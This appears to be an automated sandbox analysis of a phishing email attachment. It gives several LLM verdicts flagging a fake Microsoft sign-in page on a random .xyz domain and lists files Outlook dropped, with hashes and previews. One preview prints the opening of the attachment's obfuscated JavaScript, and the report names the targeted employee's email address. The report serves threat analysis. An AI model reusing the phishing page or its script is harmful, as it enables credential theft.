                                          ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": false,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious. The domain name is not associated with Microsoft, which is the brand identified in the image. The legitimate domain for Microsoft is 'microsoft.com'. The presence of a prominent login form asking for a password without a CAPTCHA and the use of a misleading domain name are strong indicators of phishing. Social engineering techniques are evident as the page mimics the legitimate Microsoft login page to deceive users into entering their credentials."}
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login Model: Perplexity: mixtral-8x7b-instruct
                                          {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as passwords and email addresses.","There is no sense of urgency created in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                          Title: LLZ-950309.htm OCR: Microsoft melodi@scott-electric.com Enter password Your account or password is incorrect. If you don't remember your password, reset it now. assword Forgot my password Sign in with another account Sign in Terms of use Privacy & ckies
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz Model: gpt-4o
                                          ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious due to its random string subdomain and the '.xyz' top-level domain, which is often used in phishing attacks. The webpage mimics Microsoft's login page, which is a common target for phishing. The presence of a prominent login form asking for a password without a captcha further raises suspicion. The legitimate domain for Microsoft is 'microsoft.com', and this URL does not match it. Additionally, the link for 'Forgot my password' and 'Sign in with another account' could be used to mislead users into providing their credentials."}
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login Model: Perplexity: mixtral-8x7b-instruct
                                          {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","There is no sense of urgency created in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                          Title: LLZ-950309.htm OCR: Microsoft melodi@scott-electric.com Enter password Your account or password is incorrect. If you don't remember your password, reset it now. Password Forgot my password Sign in with another account Sign in Terms of use Privacy & ckies
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz Model: gpt-4o
                                          ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": false,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious due to its random string and unusual domain extension (.xyz), which is often used in phishing attacks. The page mimics a Microsoft login page, which is a common target for phishing. The presence of a prominent login form asking for a password without a CAPTCHA increases the risk. The legitimate domain for Microsoft is 'microsoft.com', and this URL does not match it. The use of social engineering techniques is evident as the page attempts to trick the user into entering their password by displaying a message about an incorrect password. Based on these factors, the site is determined to be a phishing site."}

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):231348
                                          Entropy (8bit):4.389917379080562
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3F983F99D5949991ADC0526B13167508
                                          SHA1:BA696450EF51F803896C5C457B019488E7879300
                                          SHA-256:6CBE12B3F9213AF97C6E0BD1FF135500A7CF035735798BA348F856C5E045CA36
                                          SHA-512:65C29289B3E4A60AB2D7E3B6713B9910280956B1C0894891C8BB9BDD21BB806DA1B0AD4FCBEB28CE658C81E64EE0B3188904419627E540B4765F89ABD2323F39
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:TH02...... ..,.........SM01X...,...0...............IPM.Activity...........h...............h............H..h........O......h.........C\.H..h\tor ...AppD...hXaZ.0.........h/.....\........h........_`.k...hc...@...I.+w...h....H...8..k...0....T...............d.........2h...............kh.e.....\.v...!h.............. hc.D...........#h....8.........$h.C\.....8....."h..|.......|...'h..$...........1h/...<.........0h....4.....k../h....h......kH..hH.\.p.........-h .......$.....+h........x................... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:XML 1.0 document, ASCII text, with very long lines (2139), with no line terminators
                                          Category:dropped
                                          Size (bytes):2139
                                          Entropy (8bit):5.072738961105246
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4EE0F8584BFA8C4F99FB6D3447B82F6E
                                          SHA1:552433B080E6E29BB905ADB98799F6DB8CCC1530
                                          SHA-256:FB216474F51BB39257419B6ABAAB936B11A3B9F8471AF555F8EF641A8D170F58
                                          SHA-512:746195D9684C0351C739B39AF482110AE5CB64B1EF611EE94FB70A0A211E9570677ECE838BAF866D96B04146FAE1A5A801FBA688C364B7E137DF9AF5CFDF1814
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>14</Count><Resource><Id>Aptos_26215680</Id><LAT>2024-07-02T18:21:48Z</LAT><key>29939506207.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos_45876480</Id><LAT>2023-10-06T09:55:52Z</LAT><key>27160079615.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2023-10-06T09:55:52Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215426</Id><LAT>2023-10-06T09:55:52Z</LAT><key>37262344671.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-06T09:55:52Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-06T09:55:52Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos_

                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Lato\25090817022.ttf

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:TrueType Font data, 16 tables, 1st "GPOS", 30 names, Macintosh, Copyright (c) 2011-2015 by tyPoland Lukasz Dziedzic (http://www.typoland.com/) with Reserved Fon
                                          Category:dropped
                                          Size (bytes):656568
                                          Entropy (8bit):6.571486522102043
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8D72101CAD1547BED5BA3105041EEEAE
                                          SHA1:29EB192629B0BBB41A7B7F49AB2AEC82D4261921
                                          SHA-256:D636E4683231F931EDA222D588E944D082BFD3BDBA02F928BEE461C0F185B251
                                          SHA-512:BE6667E1F6A50E23ADA324B52FB614CA82848600A82F6EDC4EC881A3C5F5D9F0477580AF2421F42B94E1B529E07DDDA7D2D9231B128D93056B4A327D63FE7222
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:............GPOS.l.?......6rGSUBl..x...L..$lOS/2j..........`cmapP.....1$....cvt :(....R ....fpgm......E.....gasp............glyfBd.....H....head...........6hhea.......D...$hmtx...%....../<loca+.....S.../@maxp...j...h... name.I`.........post.1.Y....... prepo.i:..Qd..............._.<...........y.....a.d.....}.m...................V.........}...................................P.`.w.............T.......x.......x.......Y.&................P......!....tyPL.........V.....W .............. ...'.-.........J...H...E.......8._.8._.................k.....^.........0...1.b.M...-....... .......A...........A.^.A.^...`.........A._.....=.B.=.B.......-.........J.................5...A...A.J.D.`.....T...T. .T...T.z.T.|.T.`.V.`.V.a.W.l.R. .S. .S.../.$./.../.3./.../.../.y.1.y.1.x.1.y.1.x.1.y.1.x.1.x.1.y.1...1.../...1...1...1...1...1...1...1.y.1...1.../.2.1...1.../.Y./...1...>.`.V.\...\...\.....q...=.......c.................i.+.....m...\...\...n.T.m.K...T.a...a...`.V.....b.C.b.C.8.C.9.C.....8.1...+...)....._.+

                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Lato\28221965252.ttf

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:TrueType Font data, 16 tables, 1st "GPOS", 30 names, Macintosh, Copyright (c) 2011-2015 by tyPoland Lukasz Dziedzic (http://www.typoland.com/) with Reserved Fon
                                          Category:dropped
                                          Size (bytes):656544
                                          Entropy (8bit):6.544527043014445
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:79203A1947440EDE448A384841980E3C
                                          SHA1:A3A53A436BAAF6DC2E7A05F05866A761C214692B
                                          SHA-256:8A0AACE75D33794EECE4B28187BFC1DF0BBD2888B5D8A56E01788C8D65D16BE1
                                          SHA-512:097CD16A3A037B4257FC02B4C5EFE1ACA0B316AB96BB73FFB59ABA243B32A45E0CFD1D760C7C4C238C4CF949E22BCE22A67C757556314F1147DB76798022919B
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:............GPOS.u....$..4.GSUBl..x...4..$lOS/2k..........`cmapP.....1$....cvt <.....R ....fpgm......E.....gasp............glyf..r}...H....head.C.........6hhea...n...D...$hmtx^JN......./<loca,.....S.../@maxp...w...h... nameJ.....h....post.6.c....... prepo.i:..Qd............P..._.<...........y.....a.c.J.........................V.....J.......................................P.`.w.............g.......x.......x.......c.2................P......!....tyPL.........V.....W .............. ...F.*.........m...k...J...%...+.M.+.M.........~...~...l.....K.........Q...Q.f.[...[......./.......b...........P.K.P.K.s.M.........P.L.....I...I.........*.........m...6...=.........(...1...1.S.3.o.z...C...C.;.C...C...C...C.o.E.o.E.p.G.u.@.,.B.,.B...).K.)...).U.).D.)...)...*...*...*...*...*...*...*...*...*.9.*.8.).8.*.8.*.8.*.8.*.8.*.8.*.9.*...*.9.*...)...*...*.O.)...)...*. .1.o.E.h.z.h...h.....`...B.....-.U.........-.z.-.z...'...}...z.h.z.h.z.}.C.|.1...C.p.z.p.z.o.E...z.o.1.o.1.`.1.a.1...z.[.*..."...!...$.~."

                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):322260
                                          Entropy (8bit):4.000299760592446
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CC90D669144261B198DEAD45AA266572
                                          SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                                          SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                                          SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4

                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):10
                                          Entropy (8bit):2.1219280948873624
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3D625911F9BB007CE8FC2FCB7F2651B6
                                          SHA1:63C70CBB788FEE445E2BA30CDBD2B8918048C7A3
                                          SHA-256:3632E4110B7BB7B31351F0B08A4137AC72B223B5972840125B2A90393DB09AAF
                                          SHA-512:2B40B2BDA56E3BCDC0F03926BBB9303B6669AE77A969B846EEA5994A911CF85A4F0A2D74B8CDC5C5DFE58B596D4DF4B992C210FEA34E744DBA8B157FC368B3D6
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:1719944511

                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):0.09304735440217722
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D0DE7DB24F7B0C0FE636B34E253F1562
                                          SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
                                          SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
                                          SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:SQLite Rollback Journal
                                          Category:dropped
                                          Size (bytes):4616
                                          Entropy (8bit):0.1384465837476566
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B8B829320A9B7D5104D4A398E5B30AC4
                                          SHA1:4AA563FC1CECE51746EA4C80C6332F10346F9DEA
                                          SHA-256:31E66AF9176E4F38EFDBF84A196B291BD67119FF8475F173F473E7B411DE0231
                                          SHA-512:625E4271BA5E0B4BEF3F45B0E2CFAECBA609D6E5E3108376E243660A0538E23C13048B021440733C2D52A8040C43441E83A927B1E544110B7809BB59A583866A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.... .c.....dD......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):0.04469833793377624
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FC304C583D574FECB570374149272C7F
                                          SHA1:860E22D3B762B9767C90D7A5137576C8E0F88EBD
                                          SHA-256:C87968498EDB6C6DA0FE48581E253F56AF1BC877C349B26000CAB29B7E9D4809
                                          SHA-512:6AEA87DC0FCAF8732D8868B94C8258C4F48F455BE2371AA0B311CFDE40B0B900E2813D938564ABC5C1E4BF34F90B55F04B45DE835C647005B9C0CE12F61A5CEB
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..-...........................R..i:.f.,&J.. ...?..-...........................R..i:.f.,&J.. ...?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:SQLite Write-Ahead Log, version 3007000
                                          Category:dropped
                                          Size (bytes):45352
                                          Entropy (8bit):0.3937546313501698
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2D0D7A8F6EB0D10BE46316A0B452D8E2
                                          SHA1:2CB66DB9242236A98787EBF67C0ECC56B03C6DFD
                                          SHA-256:E53F1B002AE6C942DE159FDC6D9BBFD18EF5D33ADB67A677884DB92B1E719887
                                          SHA-512:CCE556B535F85048EB0342595A28930DB5C2F1C7DF876A00ACCC03ED29A1F842C9B8355E88996DE787759078B6FEE47C9ACDA7C48D5E8EF863921A0C984E525B
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:7....-...........i:.f.,&.!l.6/..........i:.f.,&...La.Y.SQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\LLZ-950309 (002).htm

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:HTML document, ASCII text, with very long lines (65083), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):88994
                                          Entropy (8bit):5.782582664631249
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5DAE61E2411EF0F048CDFA388ED51162
                                          SHA1:0CA5AD4647B6AB36F061C5702CEF015BFDA6A3F6
                                          SHA-256:6BEC5FB6D1E7786694E3FB88BE9F34626A543FE5979575CA16B6EE870D74C0E3
                                          SHA-512:06CF68DC4FFD714B6C85548F97D8365960BB0EE00FA6ABD7FE85B0D8019CDBBCECC3DCA37CF0BEA7DD0E8475B85D459B982DD4BC9C1090215E35AC8279AA49F5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"/>.. <meta name="robots" content="noindex, nofollow"/>.. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>.. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">..</head>..<body id="ajfpfv" data-nobymx="melodi@scott-electric.com">..<script type="text/javascript">..function a0S(U,E){var w=a0X();return a0S=function(H,X){H=H-0x10c;var S=w[H];return S;},a0S(U,E);}(function(U,E){var w3=a0S,w=U();while(!![]){try{var H=-parseInt(w3(0x2b3))/0x1*(parseInt(w3(0x2c9))/0x2)+-parseInt(w3(0x1f7))/0x3*(parseInt(w3(0x278))/0x4)+-parseInt(w3(0x13b))/0x5*(parseInt(w3(0x264))/0x6)+-parseInt(w3(0x2a3))/0x7+parseInt(w3(0x262))/0x8*(-parseInt(w3(0x11f))/0x9)+-parseInt(w3(0x139))/0xa*(parseInt(w3(0x27e))/0xb)+parseInt(w3(0x2bb))/0xc*(parseInt(w3(0x208))/0xd);if(H===E)break;else w['push'](w['shift']());}catch(X){w['push'](w[

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\LLZ-950309 (002).htm:Zone.Identifier

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:[ZoneTransfer]..ZoneId=3..

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{46C15BAB-8FAF-4D70-A85C-72D8058FA83E}.tmp

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2532
                                          Entropy (8bit):3.101258377291916
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:411FDB0C8899B250371585096C724B4C
                                          SHA1:CFDECC839A394C567223733B678810C16FA0A837
                                          SHA-256:D4C74E28A9DFF56DD964B9FDBE253757709CD86C2C75225B15F0901E75E6F7E7
                                          SHA-512:0A4254016B8ABB7047370D55A055365A3340577530CE35F028F29F011CB64EC3983DE24A973F7ED0D7AF424861376B75CAC3A029E3A58FB259283DD84143B1CA
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:....T.h.i.s. .i.s. .n.o.t. .a.n. .e.m.a.i.l. .t.h.a.t. .w.e. .g.e.n.e.r.a.t.e.d.,. .h.o.w.e.v.e.r.,. .w.e. .u.s.e. .e.m.p.l.o.y.e.e. .n.a.v.i.g.a.t.o.r..... .I.. m. .a.f.r.a.i.d. .s.o.m.e.o.n.e. .h.a.s. .h.a.c.k.e.d. .i.n.t.o. .o.u.r. .b.e.n.e.f.i.t.s. .p.o.r.t.a.l. .o.r. .s.o.m.e.t.h.i.n.g..... .P.l.e.a.s.e. .l.o.o.k. .i.n.t.o. .t.h.i.s. .a.s.a.p.......F.r.o.m.:. .M.e.l.o.d.i. .B.u.n.n. .<.m.e.l.o.d.i.@.s.c.o.t.t.-.e.l.e.c.t.r.i.c...c.o.m.>. ...S.e.n.t.:. ...............................................................b...d.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{7687C7D6-7243-4DB5-9B12-6F2D15577878}.tmp

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2048
                                          Entropy (8bit):2.4140209263986785
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:068F9109BB3B3D2786732A456EFD876E
                                          SHA1:F345FC960C4FC25F6B1ACF4F5A065471D76EF5B4
                                          SHA-256:5B5CE5A29326FC57B0497811AA3536E6CD3D125CFB854BC34080E605B5388673
                                          SHA-512:A41BC27C921AADE8A7296D736E481AD5794D90D72276E7C6B26E86081AA49B3550147AD956D193CE106F548D74123EF55813A52E2DE4E7E18A40875EE509DF22
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:....1.2.....1.....1.2.....1.2.....1.2.....1.2.....1.2.....1.2.....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(...t.o.r.r.e.s...t........................................................................................................................................................................................................................................................................................................................................................................................... ..."...(...*...0...2...8...:...@...B...H...J...P...R...V...X...\...^...d...f...l...................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1719944507347887700_4A951B57-F15D-4049-90AD-595B9C94B7A8.log

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with very long lines (28753), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):20971520
                                          Entropy (8bit):0.18152278034802263
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:634C546624728FBE8035E9B58BADBF94
                                          SHA1:643DC7E5C10DD0701A5A704E945968CA9E6DD6DB
                                          SHA-256:0B2029FDCC000370A6B7E6DD197B1291DEBBD1B1D1264146ABA53D4F94B6E74A
                                          SHA-512:791B83C02F5A6BAF6667B9E370B3F1F9F3A16F3A2D38F8FF1D44C5FE402A14E3BCEEC78194E7C2F6A40D97373A73419A67826C27341DCE3B990220BE4A929917
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/02/2024 18:21:47.377.OUTLOOK (0xF7C).0x25C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":25,"Time":"2024-07-02T18:21:47.377Z","Contract":"Office.System.Activity","Activity.CV":"VxuVSl3xSUCQrVlbnJS3qA.4.11","Activity.Duration":12,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...07/02/2024 18:21:47.393.OUTLOOK (0xF7C).0x25C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":27,"Time":"2024-07-02T18:21:47.393Z","Contract":"Office.System.Activity","Activity.CV":"VxuVSl3xSUCQrVlbnJS3qA.4.12","Activity.Duration":10678,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVers

                                          C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1719944507348618900_4A951B57-F15D-4049-90AD-595B9C94B7A8.log

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):20971520
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240702T1421470122-3964.etl

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:modified
                                          Size (bytes):86016
                                          Entropy (8bit):4.44421900025718
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FA83C9ABECC2E0F2C9A4D454E434801A
                                          SHA1:70E1C0C461FD7E6ED055D68AFB8AB216D8A7C3A3
                                          SHA-256:7324558D3443F1AB5F3D3F168421278FB927F032128B46CB7098026131E44C5A
                                          SHA-512:10C453A93E3ACDA591CDE5A9E1C424C70953F32BE8304602BE5F2B3C22675F0577A25CFB83002F6C23C0A238896DEB12740212CDC8B06F162CEEEE49BED10418
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:............................................................................b...\...|....e......................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................K..Y...........e..............v.2._.O.U.T.L.O.O.K.:.f.7.c.:.e.3.1.9.5.1.5.7.e.d.0.f.4.1.e.9.a.0.6.b.1.f.d.1.0.4.7.6.8.d.e.2...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.7.0.2.T.1.4.2.1.4.7.0.1.2.2.-.3.9.6.4...e.t.l.............P.P.\...|...........................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\~DF30FF871856D3E952.TMP

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):163840
                                          Entropy (8bit):0.4913993358695871
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0A6E0CFD10E2BB509E76146B706A409F
                                          SHA1:1EB98D1FBE93FC44670B87975D91C7E61CA51557
                                          SHA-256:4ACF525AB359441B2BBB5CBBDD431F0BFBBF68EFC69906413ADD27EFEDAE1A67
                                          SHA-512:BDCD8FEAFAE4EDA8BA6ED73DC7043240FDE1CF3ADC1F29BCAD349677A2DF30D6171E2FC64CDDE128E2479CA3DE8C7A6F640657DF45420A4788396278380E7FEF
                                          Malicious:false
